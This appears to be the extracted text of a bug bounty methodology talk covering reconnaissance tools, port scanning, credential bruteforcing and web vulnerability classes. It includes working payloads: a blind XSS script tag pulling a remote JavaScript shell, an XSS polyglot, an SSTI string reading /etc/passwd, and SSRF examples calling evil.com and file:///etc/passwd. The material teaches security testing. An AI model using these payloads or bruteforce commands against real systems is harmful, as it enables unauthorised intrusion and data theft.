The Bug Hunters Methodology v2.1
whoami
Hack Stuff Better (and practically)
What this talk is about...
And…LOTS of memes…. only some are funny
history && topics
Aka “How to Shot Web” @ DEFCON23
v2
light reading
Discovering New Targets
Discovery
TBHMv1
Sublist3r
Sub Scraping
recon-ng/enumall | Both | sublist3r |
ssltools.com API | Google (Recon-ng now handles captcha) | Baidu |
HackerTarget.com API | Bing | Ask |
Shodan | Crt.sh | DNSDumpster (scans.io) |
| ThreatCrowd | Virustotal |
Zoomeye (not core) | Netcraft | Ptrarchive.com |
Threatcrowd regged by email (not core) | | |
Zone transfer (not core) | | |
RiskIQ API (not core) | | |
Censys.io (not core) | | |
Sub Scraping (bespoke)
Sub Bruting
Tool | Command | Time to run | Threads | Found |
subbrute | time ./subbrute.py -c 100 all.txt $TARGET.com | tee subbrute.output | errored | 100 | 0 |
gobuster | time gobuster -m dns -u $TARGET.com -t 100 -w all.txt | 21m15.857s | 100 | 87 |
massdns | time ./subbrute.py /root/work/bin/all.txt $TARGET.com | ./bin/massdns -r resolvers.txt -t A -a -o -w massdns_output.txt - | 1m24.167 | n/a | 213 |
dns-parallel-prober | time python dns-queue.py $TARGET.com 100 $TARGET_outputfile -i /root/work/bin/all.txt | 42m2.868s | 100 | 43 |
blacksheepwall | time ./blacksheepwall_linux_amd64 -clean -dictionary /root/work/bin/all.txt -domain $TARGET.com | 256m9.385s | 100 | 61 |
1,136,964 line subdomain dictionary (all.txt)
Sub Bruting
With Massdns, why not all of them?
all.txt
https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
Acquisitions
Port Scanning
Tool | Time to run | Found |
masscan masscan -p1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,
5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389,280,4567,7001,8008,9080 -iL $TARGET_LIST --max-rate 100000 -oG $TARGET_OUTPUT | 11m4.164s | 196 |
nmap | ∞ | zzz |
65536 unverified hosts (a large target's ASN)
Interlude... credential bruteforce
masscan
Brutespray credential bruteforce
Nmap service scan -oG
python brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt --threads 5 --hosts 5
https://github.com/x90skysn3k/brutespray
Visual Identification
On App Discovery
WALKING & UNDERSTANDING THE APP
Platform Identification and CVE searching
TBHMv1
Coverage for Heavy js sites
jsparser
Linkfinder
Content Discovery / Directory Bruting
TBHMv1
CommonSpeak and Scans.io data
Parameter Bruting?
Identify IPs and main TLDs
ASNs
Reverse Whois
Acquisitions
++
Domain bruteforcing,
Resolve && add new IP ranges
Domain scraping for discovered TLDs
Portscan
Visual Identification
Platform Identification
Content Discovery
enumall
sublist3r
++
Massdns
Manual
masscan
eyewitness
Parameter discovery
Builtwith
Wappalyzer
++
Patator or gobuster
Wordlists
Burp
Parameth
Burp analyze target
XSS
XSS (not a lot)
TBHMv1
Blind XSS
“><script src=//y.vg></script>
BUG
Jamie: I really enjoy my super admin access this morning !!!
Y.vg is a javascript shell !!#!
Frans: I really enjoy my NEW super admin access this morning !!!
XSSHunter
Payload:
XSS Polyglot #4
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Jackmasa’s XSS Mindmap
https://github.com/jhaddix/XSS.png
Server Side Template Injection
SSTI
Core Idea: Does the application utilize a template engine? ++
TBHMv1
SSTI
1: https://acme.com/errorpage{{2*3}}
2:
https://acme.com/errorpage{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
SSTI Tooling
Server Side Template Injection & Logic / Debug parameters
{regex + perm} template | content |
preview | redirect |
id | |
view | |
activity | |
name | |
http://acme.com/script?name={{2*3}}
Server Side Request Forgery
SSRF
Common Parameters or Injection points from TBHMv1 | |
file= | folder= |
location= | style= |
locale= | template= |
path= | doc= |
display= | source= |
load= | pdf= |
read= | dest= |
retrieve= | continue= |
TBHMv1
SSRF (GET examples)
http://ACME.com/redirect.php?url=http://google.com
http://ACME.com/redirect.php?url=//google.com
http://ACME.com/redirect.php?url=google.com
http://ACME.com/redirect.php?url=/PATH/SOMETHING/here
http://ACME.com/redirect.php?url=file:///etc/passwd
http://acme.com/ssrf.php?url=tftp://evil.com:12346/TESTPACKET
SSRF Resources
Server Side Request Forgery
Many on the File Includes / Dir Traversal table
{regex + perm} dest | {regex} redirect | {regex + perm} uri | {regex} path |
{regex} continue | {regex + perm} url | {regex} window | {regex} next |
{regex} data | {regex} reference | {regex + perm} site | {regex} html |
{regex + perm} val | {regex} validate | {regex} domain | {regex} callback |
{regex} return | {regex + perm} page | {regex} feed | {regex} host |
{regex} port | | | |
http://acme.com/script?uri=ftp://site
Code Inj, CMDi, & Future Fuzzing, ++
Code Injection + CMD Injection + New Fuzzing
TBHMv1
albinowax (James Kettle)
IDOR - MFLAC
Insecure Direct Object Reference
{regex + perm} id | {regex + perm} user | |
{regex + perm} account | {regex + perm} number | |
{regex + perm} order | {regex + perm} no | |
{regex + perm} doc | {regex + perm} key | |
{regex + perm} email | {regex + perm} group | |
{regex + perm} profile | {regex + perm} edit | REST numeric paths |
http://acme.com/script?user=21856
Code Injection + CMD Injection
Backslash Powered Scanner
Infrastructure & Config
Subdomain takeover!
Subdomain Takeover
Robbing Misconfigured Sh** (AWS)
Robbing Misconfigured Sh** (git)
WAF
What’s in a name?
SOAP Services
Bespoke .nfo
resources!
SSRF Resources
Pivoting from blind SSRF to RCE with HashiCorp Consul - Peter Adkins | |
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2) - Seth Art | |
Server-side browsing considered harmful - Nicolas Grégoire | |
How To: Server-Side Request Forgery (SSRF) - Jobert Abma | |
Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read - Brett Buerhaus | |
Burp, Collaborate, and Listen: A Pentester Reviews the Latest Burp Suite Addition - Max Zinkus |
CommInj Resources
SSTI
Resources
Original Whitepaper - James Kettle | |
OWASP SSTI Workshop - Gérôme Dieu | |
Exploring SSTI in Flask/Jinja2 - Tim Tomes | |
Injecting Flask - Ryan Reid | |
Rails Dynamic Render to RCE (CVE-2016-0752) - John Poulin | |
uber.com may RCE by Flask Jinja2 Template Injection - Orange Tsai |
Hi Pete!
Links
Peter Yaworski | https://leanpub.com/web-hacking-101 |
Andy Gill | https://leanpub.com/ltr101-breaking-into-infosec |
aboul3la | https://github.com/aboul3la/Sublist3r |
jhaddix | https://github.com/jhaddix/domain |
Tim Tomes | https://bitbucket.org/LaNMaSteR53/recon-ng |
@infosec_au & @nnwakelam | https://github.com/infosec-au/altdns |
blechschmidt | https://github.com/blechschmidt/massdns |
robertdavidgraham | https://github.com/robertdavidgraham/masscan |
jhaddix - all.txt | https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056 |
anshumanbh | https://github.com/anshumanbh/brutesubs |
OJ Reeves | https://github.com/OJ/gobuster |
Links
epinna | https://github.com/epinna/tplmap |
| https://github.com/mak-/parameth |
| https://gist.github.com/anshumanbh/96a0b81dfe318e9e956013209e178fa9 |
| https://github.com/ChrisTruncer/EyeWitness |
| https://github.com/jackmasa/XSS.png |
| https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056 |
Links
| https://github.com/lorenzog/dns-parallel-prober |
SSRF Bible | https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit# |
| https://github.com/ewilded/psychoPATH |
| https://github.com/commixproject/commix |
Links
| https://github.com/qazbnm456/awesome-web-security |
| https://github.com/infoslack/awesome-web-hacking |
| https://github.com/djadmin/awesome-bug-bounty |
Jason Haddix - @jhaddix
jhaddix@bugcrowd.com